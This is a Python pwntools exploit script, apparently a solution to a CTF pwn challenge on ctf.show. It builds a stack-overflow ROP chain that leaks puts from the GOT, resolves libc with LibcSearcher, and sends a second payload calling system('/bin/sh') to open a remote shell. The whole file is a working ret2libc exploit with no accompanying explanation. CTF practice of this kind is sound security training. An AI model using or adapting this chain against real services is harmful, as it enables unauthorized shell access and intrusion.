1
'''
2
- 本地正常:python3 exp.py
3
- 远程正常:python3 exp.py REMOTE
4
'''
5
from pwn import *
6
from LibcSearcher import *
7
context(os="linux", terminal=["cmd.exe", "/c", "start"])
8

9
binary_path = "./pwn"
10
host = "pwn.challenge.ctf.show"#网址
11
port = 28117#端口
12

13
elf = ELF(binary_path, checksec=False)
14
context.binary = elf
15

16
if elf.bits == 64:
17
    context.arch = "amd64"
18
    gdbscript = """
19
    b *main
20
    c
21
    """
22
else:
23
    context.arch = "i386"
24
    gdbscript = """
25
    b *main
26
    c
27
    """
28

29

30
context.log_level = "debug"
31

32

33
if args.REMOTE:
34
    io = remote(host, port)
35
else:
36
    io = process(binary_path)
37

38
def p():
39
    pause()
40

41
#todo
42
puts_plt = elf.plt['puts']
43
puts_got = elf.got['puts']
44
main = elf.sym['main']#0x804863E
45
offset = 0x70 + 8
46
ret=0x4004fe
47
rdi=0x400803
48
payload = flat([cyclic(offset),rdi,puts_got,puts_plt,main])
49
io.recv()
50
io.sendline(payload)
51

52
puts_real = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
53
libc=LibcSearcher('puts',puts_real)
54
base=puts_real-libc.dump('puts')
55
system = base + libc.dump('system')
56
bin_sh = base + libc.dump('str_bin_sh')
57
payload = cyclic(offset) + p64(ret) + p64(rdi) + p64(bin_sh) + p64(system)
58
io.sendline(payload)
59

60
io.interactive()